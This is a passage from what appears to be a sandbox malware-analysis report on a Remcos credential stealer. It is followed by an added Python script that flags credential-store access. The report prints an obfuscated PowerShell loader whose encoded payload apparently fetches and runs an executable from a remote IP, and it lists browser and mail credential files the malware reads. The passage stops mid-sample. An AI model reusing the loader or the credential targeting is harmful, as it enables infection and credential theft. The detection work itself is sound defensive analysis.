          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,34_2_0041881C
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,35_2_004082CD
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040333D
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
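          The behaviour lines above (Vaccinerende.exe locating the Firefox NSS database files key3.db, cert8.db and secmod.db, mshta.exe reading the MachineGuid) and the "Stealing of Sensitive Information" lines that follow (Chrome Login Data and Web Data, the Windows Mail .oeaccount directories, the Outlook MAPI profile hive, the Google Talk, Paltalk, IncrediMail and Windows Live Mail account keys) are the observable footprint of the Remcos credential stealer. The Python script below is an added triage example and is not part of the Joe Sandbox report or of the malware: it parses lines in the report's own "Source: <process><action>: <target>" form and flags credential-store access by any process that has no business touching the store. The sample lines are copied from this report, plus one constructed benign firefox.exe line; the sets of processes allowed to open each store, and the list of scripting hosts for which a MachineGuid read is flagged, are this example's assumptions, not something the report states.

```python
"""Triage helper for Joe Sandbox behaviour lines (added example, not part of
the report).  Flags credential-store access by processes that have no
legitimate reason to touch the store.  The allowed-process sets are this
example's assumptions, not report data."""
import re
from collections import defaultdict

# Report lines fuse the process path and the action ("...exeFile opened:");
# \s* also accepts a separator in case the report is reformatted.
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?\.exe)\s*"
    r"(?P<action>File opened|Key opened|Key value queried|Directory queried|"
    r"Queries volume information):\s+"
    r"(?P<target>.+?)(?:\s+VolumeInformation)?$"
)

# (category, regex over the accessed path or key, processes allowed to touch it).
# An allowed set of None means: flag only scripting hosts (host fingerprinting).
RULES = [
    ("firefox_nss_keystore",   # legacy key3/cert8 and current key4/cert9/logins.json
     re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key[34]\.db|cert[89]\.db|secmod\.db|logins\.json)$", re.I),
     {"firefox.exe"}),
    ("firefox_profile",
     re.compile(r"\\Mozilla\\Firefox\\(profiles\.ini|Profiles\\[^\\]+\\places\.sqlite)$", re.I),
     {"firefox.exe"}),
    ("chrome_login_data",
     re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|Web Data)$", re.I),
     {"chrome.exe"}),
    ("windows_mail",           # .oeaccount files live under this tree
     re.compile(r"\\Microsoft\\Windows Mail(\\|\s|$)", re.I),
     {"winmail.exe"}),         # assumption: the Windows Mail client binary
    ("outlook_mapi_profiles",
     re.compile(r"\\Windows Messaging Subsystem\\Profiles", re.I),
     {"outlook.exe"}),
    ("outlook_omi_accounts",
     re.compile(r"\\Office\\Outlook\\OMI Account Manager\\Accounts$", re.I),
     {"outlook.exe"}),
    ("im_accounts",
     re.compile(r"\\Software\\(Google\\Google Talk\\Accounts|Paltalk)$", re.I),
     {"googletalk.exe", "paltalk.exe"}),   # assumption
    ("mail_client_accounts",
     re.compile(r"\\Software\\(IncrediMail\\Identities|Microsoft\\Windows Live Mail)$", re.I),
     {"incmail.exe", "wlmail.exe"}),       # assumption
    ("host_fingerprint",
     re.compile(r"\\SOFTWARE\\Microsoft\\Cryptography MachineGuid$", re.I),
     None),
]
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "rundll32.exe"}


def parse(line):
    """Return (process basename lowercased, action, target) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc = m.group("proc").rsplit("\\", 1)[-1].lower()
    return proc, m.group("action"), m.group("target")


def classify(proc_name, target):
    """Category name if this process/target pair is suspicious, else None."""
    for category, pattern, allowed in RULES:
        if not pattern.search(target):
            continue
        if allowed is None:
            return category if proc_name in SCRIPT_HOSTS else None
        return None if proc_name in allowed else category
    return None


def find_credential_access(lines):
    """Map each flagged process name to the sorted list of store categories it touched."""
    hits = defaultdict(set)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        proc, _action, target = parsed
        category = classify(proc, target)
        if category:
            hits[proc].add(category)
    return {proc: sorted(cats) for proc, cats in hits.items()}


# Sample input: lines copied from this report, plus a constructed benign
# firefox.exe line (last) that must not be flagged.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
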